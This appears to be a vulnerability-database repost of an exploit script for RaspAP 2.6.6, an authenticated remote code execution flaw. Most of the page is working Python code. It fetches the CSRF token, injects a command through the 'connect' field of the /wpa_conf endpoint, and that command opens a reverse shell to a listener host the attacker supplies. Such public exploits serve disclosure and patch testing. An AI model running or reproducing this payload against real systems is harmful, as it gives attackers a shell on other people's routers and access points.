Tuesday, August 24, 2021

RaspAP 2.6.6 Remote Code Execution

# Exploit Title: RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)
# Date: 23.08.2021
# Exploit Author: Moritz Gruber <[email protected]>
# Vendor Homepage: https://raspap.com/
# Software Link: https://github.com/RaspAP/raspap-webgui
# Version: 2.6.6
# Tested on: Linux raspberrypi 5.10.52-v7+

import requests
from requests.api import post
from requests.auth import HTTPBasicAuth
from bs4 import BeautifulSoup
import sys, re

if len(sys.argv) != 7:
print("python3 exec-raspap.py <target-host> <target-port> <username> <password> <reverse-host> <reverse-port>")
sys.exit()
else:
target_host = sys.argv[1]
target_port = sys.argv[2]
username = sys.argv[3]
password = sys.argv[4]
listener_host = sys.argv[5]
listener_port = sys.argv[6]

endpoint = "/wpa_conf"
exploit = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_host}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
url = "http://{}:{}/{}".format(target_host,target_port,endpoint)

s = requests.Session()

get_Request = s.get(url, auth=HTTPBasicAuth(username, password))
soup = BeautifulSoup(get_Request.text, "lxml")
csrf_token = soup.find("meta",{"name":"csrf_token"}).get("content")

post_data = {
"csrf_token": csrf_token,
"connect": "wlan; {}".format(exploit)
}
post_Request = s.post(url, data=post_data, auth=HTTPBasicAuth(username, password))
if post_Request.status_code:
print("Exploit send.")
else:
print("Something went wrong.")
print("Done")

 

Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated